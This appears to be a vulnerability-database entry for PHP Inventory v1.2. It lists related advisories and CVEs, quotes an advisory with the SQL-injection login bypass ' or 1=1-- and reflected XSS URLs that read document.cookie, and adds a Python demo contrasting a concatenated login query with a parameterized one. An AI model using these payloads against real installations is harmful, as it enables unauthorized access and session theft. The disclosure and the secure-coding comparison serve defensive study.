PHP Inventory v1.2 Authentication Bypass SQL Injection
Related entries (same vulnerability family, 17 in total):

Reporter | Title | Published | Family
---|---|---|---
OpenVAS | PHP Inventory < 1.3.2 SQLi Vulnerability | 5 Dec 2011 00:00 | openvas
OpenVAS | PHP Inventory Multiple Vulnerabilities | 22 Jan 2010 00:00 | openvas
Packet Storm | PHP Inventory 1.3.1 SQL Injection | 30 Nov 2011 00:00 | packetstorm
securityvulns | PHP Inventory 1.3.1 Remote (Auth Bypass) SQL Injection Vulnerability | 4 Dec 2011 00:00 | securityvulns
securityvulns | Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 5 Dec 2011 00:00 | securityvulns
Cvelist | CVE-2009-4595 | 12 Jan 2010 17:00 | cvelist
Cvelist | CVE-2009-4596 | 12 Jan 2010 17:00 | cvelist
Cvelist | CVE-2009-4597 | 12 Jan 2010 17:00 | cvelist
Prion | Sql injection | 12 Jan 2010 17:30 | prion
Prion | Sql injection | 12 Jan 2010 17:30 | prion
#################################################################
#
# PHP Inventory v1.2 Remote (Auth Bypass) SQL Injection Vulnerability
# Found By: mr_me
# Download: http://www.phpwares.com/content/php-inventory
# Tested On: Windows Vista
# Note: For educational purposes only
#
#################################################################
First of all, let's log in to admin with:
http://[server]/php-inventory/index.php
username: ' or 1=1--
password: ' or 1=1--
The app is riddled with SQL Injection. For example:
http://[server]/php-inventory/index.php?sub=users&action=details&user_id=[SQLI]
SELECT * FROM `site_users` WHERE `user_id`='1003''You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''1003''' at line 1
This of course means you can do some slightly dodgy reflected XSS:
http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://[server]/php-inventory/index.php?sub=suppliers&action=details&sup_id='><script>alert(document.cookie)</script>
I leave the exploiting up to the reader.
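As an added example (not code from the advisory or from PHP Inventory itself), the following Python script rebuilds the string-concatenated login query that the bypass above implies, next to a parameterized version of the same lookup. The in-memory SQLite `site_users` table, its columns and the credentials are constructed stand-ins for the app's MySQL table.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the app's `site_users` table (SQLite, in memory)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE site_users (user_id INTEGER, username TEXT, password TEXT)")
    # Plaintext passwords only to keep the demo short; real code stores a salted hash.
    db.executemany(
        "INSERT INTO site_users VALUES (?, ?, ?)",
        [(1001, "admin", "s3cret"), (1003, "clerk", "hunter2")],
    )
    db.commit()
    return db


def login_vulnerable(db, username, password):
    """Query built by concatenation, the pattern the advisory's error message reveals.

    With username and password both set to ' or 1=1-- the WHERE clause becomes
    username='' or 1=1 and the rest of the statement is commented out, so the
    first row (admin) is returned without any valid credentials.
    """
    sql = (
        "SELECT username FROM site_users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, username, password):
    """Same lookup with bound parameters: the payload is compared as a literal string."""
    sql = "SELECT username FROM site_users WHERE username=? AND password=?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"   # the auth-bypass value from the advisory
    print("vulnerable:", login_vulnerable(db, payload, payload))  # admin
    print("parameterized:", login_safe(db, payload, payload))    # None
    print("real login:", login_safe(db, "admin", "s3cret"))      # admin
```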